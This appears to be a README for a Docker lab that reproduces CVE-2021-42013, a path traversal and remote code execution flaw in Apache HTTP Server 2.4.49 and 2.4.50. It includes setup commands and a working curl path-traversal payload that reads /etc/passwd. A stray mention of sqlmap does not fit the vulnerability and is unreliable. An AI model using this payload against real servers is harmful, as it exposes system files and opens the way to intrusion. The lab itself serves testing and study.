
CVE: 2021-42013 Tested on: 2.4.49 and 2.4.50 Description: Path Traversal or Remote Code Execution vulnerabilities in Apache 2.4.49 and 2.4.50
This project aims to dockerize a specific vulnerability using Docker. The goal is to create an isolated environment in which the vulnerability can be exploited and tested securely.
Apache HTTP Server 2.4.50 - Remote Code Execution && Path Traversal
To run this project, you need to have on your machine:
Once the prerequisites are installed, you can clone this Git repository onto your machine:
git clone https://github.com/cybfar/cve-2021-42013-httpd.git
cd Ccve-2021-42013-httpd
Once in the directory, run the command below to set up the vulnerable environment:
docker build -t apache-httpd-vuln .
docker run -p 8000:80 apache-httpd-vuln
Then access the application at http://localhost:8000 If everything goes well, you should see "It works" displayed.
Executing this payload with curl below shows that the target is vulnerable. The script will generate the appropriate sqlmap command to exploit the vulnerability
curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd
This payload can directly access user information in the system without the user's consent.
Once we have enabled the cgi or cgid mods on the server, this vulnerability will allow an attacker to execute arbitrary commands